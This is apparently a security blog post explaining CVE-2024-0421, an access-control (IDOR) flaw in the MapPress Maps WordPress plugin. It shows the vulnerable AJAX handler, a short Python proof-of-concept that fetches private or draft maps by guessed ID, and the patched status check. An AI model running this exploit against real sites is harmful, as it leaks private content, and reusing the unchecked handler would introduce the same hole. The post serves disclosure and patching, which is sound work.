WordPress is well-known for its massive ecosystem, but sometimes plugins introduce big risks. One example is CVE-2024-0421, a recently discovered vulnerability in the popular MapPress Maps plugin that affects all versions before 2.88.16. If you use or manage a WordPress site with MapPress, you need to pay attention. In this post, I’ll break down the vulnerability, show how it can be abused (with code!), and share all the details you need to stay safe.
What Is CVE-2024-0421?
CVE-2024-0421 is a security vulnerability in the MapPress Maps for WordPress plugin that allows unauthorized visitors to access information they shouldn’t be able to see. The root cause is an _Insecure Direct Object Reference_ (IDOR) flaw in the way the plugin handles AJAX requests for map information.
Affected versions: All MapPress Maps versions before 2.88.16
Patched: Yes — in version 2.88.16
How Does It Work?
When someone requests a map via the plugin’s AJAX action, the plugin does not properly check whether the map is public or private. This means anyone, even people who aren’t logged in, can fetch private or draft maps just by guessing the right IDs.
The Bug in Code
Let’s look at a simplified version of what’s happening.
The affected AJAX handler looks like this (simplified for clarity)
// Handling AJAX call to fetch a map by ID
add_action('wp_ajax_mappress_get_map', 'mappress_get_map'); // only for logged-in users
add_action('wp_ajax_nopriv_mappress_get_map', 'mappress_get_map'); // for ANYONE
function mappress_get_map() {
$map_id = intval($_REQUEST['map_id']);
// Here's the problem:
// No check if the map (a post) is 'publish', 'draft', 'private', etc.
$map = get_post($map_id);
if ($map) {
echo json_encode($map);
} else {
echo json_encode(['error' => 'Map not found']);
}
wp_die();
}
There is no check on $map->post_status. This means that if an attacker knows or guesses a map’s internal post_ID, they can retrieve its details — even if it’s set to ‘private’ or ‘draft.’
Exploiting the IDOR (With Example Code)
Suppose you are an unauthenticated user, but you know (or brute-force) a map_id. You can simply POST to the AJAX action’s endpoint and get the map data.
For most WordPress sites, the AJAX URL is /wp-admin/admin-ajax.php.
Step-by-Step Exploit (Python Example)
import requests
site = "https://example.com";
ajax_url = f"{site}/wp-admin/admin-ajax.php"
map_id = 42 # Change as needed
params = {
'action': 'mappress_get_map',
'map_id': map_id,
}
response = requests.post(ajax_url, data=params)
print(response.text)
What happens: This will return the map post, no matter if it is private or unpublished—leaking locations, notes, or sensitive internal content.
How Was It Fixed?
In version 2.88.16, the plugin authors added a status check. The handler now only returns maps that are public (post_status == 'publish'). That’s the right way to handle it:
$map = get_post($map_id);
// Only return if post exists AND is public
if ($map && $map->post_status === 'publish') {
echo json_encode($map);
} else {
echo json_encode(['error' => 'Map not found or not public']);
}
References and Further Reading
- Original Security Advisory by Patchstack
- WordPress Plugin Directory – MapPress Maps
- CVE Record - CVE-2024-0421
- What is an IDOR vulnerability? (PortSwigger)
Final Thoughts
CVE-2024-0421 shows it pays to review plugin code for access control problems. Even well-trusted plugins can overlook fundamental security checks. Keep your plugins updated—and remember, the simplest bugs often have the biggest impacts.
If you run MapPress, patch now and stay secure!
Timeline
Published on: 02/12/2024 16:15:08 UTC
Last modified on: 10/04/2024 16:52:52 UTC